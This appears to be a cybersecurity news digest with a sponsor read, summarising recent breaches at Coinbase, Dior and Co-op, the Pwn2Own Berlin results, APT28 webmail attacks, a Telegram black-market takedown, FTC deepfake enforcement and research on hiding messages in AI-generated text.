In today’s cybersecurity news…
Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom
Coinbase says attackers bribed overseas support agents to steal sensitive customer data, including names, contact details, partial Social Security numbers, and government ID images, although no passwords, private keys, or funds. Coinbase says it refused to pay a $20M ransom, but did say the breach may cost up to $400 million to resolve internally, while it cooperates with law enforcement and enhances security measures.
(CNBC)
Windows 11 and Red Hat Linux hacked on first day of Pwn2Own
On day one of Pwn2Own Berlin 2025, researchers earned $260,000 by exploiting zero-days in Windows 11, Red Hat Linux, Oracle VirtualBox, and Docker Desktop. Attacks included privilege escalations and sandbox escapes using bugs like use-after-free and integer overflows. Vendors have 90 days to patch the flaws. The competition is running through Saturday May 17, offering more than $1 million in prizes.
The Internet’s biggest-ever black market just shut down amid a Telegram purge
Telegram shut down Haowang Guarantee—formerly Huione Guarantee—after WIRED reported it was complicit in over $27 billion in illicit transactions, letting crypto scammers launder money using Tether and offering services like stolen data, deepfakes, and tools for human trafficking operations. The takedown followed reports from blockchain analytics firm Elliptic, which also linked another Telegram-based market, Xinbi Guarantee, to $8.4 billion in similar activity. Telegram said the bans align with its terms prohibiting illegal activity.
(Wired)
Kremlin-linked hackers target webmail servers of Eastern European government agencies
Russia-linked hacking group APT28 (aka Fancy Bear) has been targeting webmail servers used by Eastern European government agencies and defense firms, exploiting XSS vulnerabilities to steal login credentials and access emails. The phishing campaign has said to affect entities in Ukraine, Romania, Bulgaria, and other regions. Victims received emails with embedded malicious code, often disguised as news links. APT28 has previously exploited vulnerabilities in Roundcube and Zimbra webmail systems and is believed to be tied to Russia’s GRU.
Huge thanks to our sponsor, Vanta
But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting, and helps you get security questionnaires done 5 times faster with AI.
Now that’s…a new way to GRC. Get started at Vanta.com/headlines.
Dior confirms data breach affecting customer information
French luxury brand Dior confirmed a data breach discovered on May 7th, impacting customers in countries like China and South Korea affecting information like names, contact details, addresses, and purchase preferences. Financial data and passwords don’t appear to be compromised. Dior says it’s notified affected individuals and is investigating the incident, while Korean authorities are reviewing the company’s response.
FTC wants a new, segregated software system to police deepfake porn
The FTC is seeking to enforce the Take It Down Act targeting nonconsensual deepfake porn. Chair Andrew Ferguson told Congress the agency needs more funding, secure software, and specialized staff to review explicit content and pursue enforcement. The law requires platforms to remove such content within 48 hours, but that could be a challenge under current law. Controversy also continues over the US President’s firing of two Democratic commissioners, raising concerns about agency independence and potential legal challenges.
Scientists use AI to encrypt secret messages that are invisible to cybersecurity systems
Researchers from the University of Oslo have developed EmbedderLLM, a system that hides encrypted messages in AI-generated text, making them invisible to current cybersecurity tools. The technique embeds data into natural-sounding chatbot responses and can be sent via any messaging platform. It supports both symmetric and public-key encryption and is resistant to quantum decryption.
‘They yanked their own plug’: How Co-op averted an even worse cyber attack
Attackers from the DragonForce cybercrime group attempted to infect UK retailer Co-op with ransomware, but in response the company took its own systems offline. Customer data was still stolen, but Co-op avoided full system lockout and is recovering faster than Marks&Spencer, which suffered deeper system compromise and has had ongoing disruptions, while maintaining no payment or password details were accessed. It’s expensive though, costing M&S an estimated £43 million per week. The same group also claims responsibility for attacks on Harrods and uses Telegram and Discord to coordinate activities.
(BBC)